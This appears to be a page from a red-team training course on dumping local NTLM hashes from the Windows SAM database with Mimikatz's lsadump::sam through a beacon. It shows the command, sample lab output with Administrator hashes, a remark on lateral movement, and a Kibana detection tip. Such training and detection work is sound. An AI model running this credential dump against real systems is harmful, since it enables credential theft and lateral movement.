Security Account Manager
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam
Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
This command requires elevated privileges.
\
beacon> mimikatz !lsadump::sam
Domain : WKSTN-2
SysKey : b9dc7de8b1972237bbbd7f82d970f79a
Local SID : S-1-5-21-2281971671-4135076198-2136761646
SAMKey : b0664279732686cfbb4b788c078fea82
RID : 000001f4 (500)
User : Administrator
Hash NTLM: fc525c9683e8fe067095ba2ddc971889
lm - 0: 91b6e660bcac036ae7ab67a3d383bc82
ntlm- 0: fc525c9683e8fe067095ba2ddc971889
\
OPSEC This module will open a handle to the SAM registry hive. Use the "Suspicious SAM Hive Handle" saved search in Kibana to see them.
\

Last updated